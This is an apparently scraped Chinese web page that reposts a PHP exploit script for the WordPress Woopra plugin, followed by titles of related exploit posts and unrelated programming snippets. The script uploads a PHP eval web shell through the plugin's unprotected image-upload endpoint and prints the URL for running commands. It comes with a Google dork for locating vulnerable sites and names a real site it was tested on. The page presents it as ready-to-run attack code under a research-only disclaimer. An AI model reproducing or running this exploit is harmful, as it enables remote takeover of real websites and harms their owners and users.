测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
  2. # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
  3. # Date: [06-10-2013]
  4. # Exploit Author: wantexz
  5. # Vendor Homepage:wordpress.org/plugins/woopra/
  6. # Software Link: wordpress.org/plugins/woopra
  7. # Version: woopra
  8. # Tested on: [wantexz]
  9. # CVE :
  10. # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
  11. ############################################################################################
  12. # INDONESIANCODER
  13. # by
  14. # WANTEXZ
  15. #
  16. ############################################################################################
  17. <?php
  18. # woopra plugins ~ Exploit
  19. # http://indonesiancoder.com/
  20. #
  21. echo <<<EOT
  22. # -----------------------------------
  23. #/ woopra ~ Exploit \
  24. #\ Author: wantexz /
  25. # -----------------------------------
  26. ################################################################################################
  27. # Author: WANTEXZ
  28. #
  29. # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
  30. # all indonesian coder, indonesian defacer, kill-9
  31. ,jatimcom , malangcyber
  32. #
  33. ################################################################################################
  34. EOT;
  35. $options = getopt('u:f:');
  36. if(!isset($options['u'], $options['f']))
  37. die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
  38. -u http://target.com/ The full path to Joomla!
  39. -f shell.php The name of the file to create.\n");
  40. $url = $options['u'];
  41. $file = $options['f'];
  42. $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
  43. $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
  44. $data ="<?php eval(\$_GET['cmd']); ?>";
  45. $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
  46. rv:15.0) Gecko/20100101 Firefox/15.0.1',
  47. 'Content-Type: text/plain');
  48. echo " [+] Submitting request to: {$options['u']}\n";
  49. $handle = curl_init();
  50. curl_setopt($handle, CURLOPT_URL, $url);
  51. curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
  52. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
  53. curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
  54. $source = curl_exec($handle);
  55. curl_close($handle);
  56. if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
  57. @fopen($shell,'r'))
  58. {
  59. echo " [+] Exploit completed successfully!\n";
  60. echo " ______________________________________________\n\n
  61. {$shell}?cmd=system('id');\n";
  62. }
  63. else
  64. {
  65. die(" [+] Exploit was unsuccessful.\n");
  66. }
  67. ?>

WordPress Woopra plugin remote PHP arbitrary code execution exploit.的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. DayuCMS 1.525 /include/global.func.php Foreground Arbitrary Code Execution

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://joychou.org/in ...

  3. [EXP]Microsoft Windows CONTACT - Remote Code Execution

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...

  4. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  5. Insecure default in Elasticsearch enables remote code execution

    Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to exe ...

  6. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  7. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  8. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

  9. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

随机推荐

  1. Java_Web学习笔记_过滤器应用案例(解决全站字符乱码)

    解决全站字符乱码(POST和GET中文编码问题) servlet: l  POST:request.setCharacterEncoding(“utf-8”); l  GET: String user ...

  2. 时间处理总结(二)oracle

    不断总结中................. 1.等于land.djsj=to_date('2016/7/26','yyyy-MM-dd')2.大于等于land.djsj>=to_date('2 ...

  3. 什么是NSTimer

    本文主要是介绍什么是NSTimer,具体使用请参考上一篇博客. 1.什么是NSTimer? NSTimer就是timer就是一个能在从现在开始的后面的某一个时刻或者周期性的执行我们指定的方法的对象. ...

  4. c语言中数组相关问题

    c语言中数组相关问题: 1.数组基本定义: 相同数据类型的元素按一定顺序排列的集合,就是把有限个类型相同的变量用一个名字命名,然后用编号区分他们的变量的集合,这个名字称为数组名,编号称为下标.组成数组 ...

  5. C#多线程(一) 入门

    本文你会了解如下内容: 1.计算机程序.进程.线程的概念 2.多线程的概念.为什么需要多线程.多线程的好处与坏处 3.C# 线程的一些概念与操作(创建线程.像线程中传递参数.给线程取名.前后台线程.线 ...

  6. javascript document对象 第21节

    <html> <head> <title>DOM对象</title> <style type="text/css"> t ...

  7. 漫话JavaScript与异步·第一话——异步:何处惹尘埃

    自JavaScript诞生之日起,频繁与异步打交道便是这门语言的使命,并为此衍生出了许多设计和理念.因此,深入理解异步的概念对于前端工程师来说极为重要. 什么是异步? 程序是分"块" ...

  8. js使用正则表达式去空格

    写成类的方法格式如下:(str.trim();) <script language="javascript"> String.prototype.trim=functi ...

  9. Splay tree

    类别:二叉排序树 空间效率:O(n) 时间效率:O(log n)内完成插入.查找.删除操作 创造者:Daniel Sleator和Robert Tarjan 优点:每次查询会调整树的结构,使被查询频率 ...

  10. jQuery DataTables 插件使用笔记

    初始化 在页面中 <!DOCTYPE html> <html> <head> <link rel="stylesheet" type=&q ...